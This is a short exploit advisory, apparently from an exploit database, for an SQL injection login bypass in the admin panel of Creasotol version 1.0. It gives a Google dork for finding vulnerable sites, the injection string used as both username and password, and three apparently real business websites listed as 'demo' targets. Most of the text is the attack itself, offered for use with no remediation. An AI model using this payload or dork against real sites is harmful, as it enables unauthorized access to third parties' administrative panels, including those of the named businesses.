Creasotol version 1.0 suffers from a remote SQL injection vulnerability in the administrative panel that allows for login bypass.
97dbb98f7109c686d9a9995fa3726c9a######################
# Exploit Title : Creasotol Admin Panel Bypass
# Dork : "DiseA+-o Web : www.creasotol.com"
# Author : &Warrior&
# Vendor Homepage : https://creasotol.com
# Date : 23/08/2018
# Version : 1.0
# Category : Webapps
# Tested On : windows 10, firefox
######################
# Proof Of Concept (POC):
# search google dork : "DiseA+-o Web : www.creasotol.com"
# Admin Panel : http://site.com/admin/
# username : '=''or'
# password : '=''or'
######################
# Demo :
# https://www.biotaconsultoria.com/admin/
# https://www.superquesudos.com/admin/
# https://www.carloshormechea.com/admin/
######################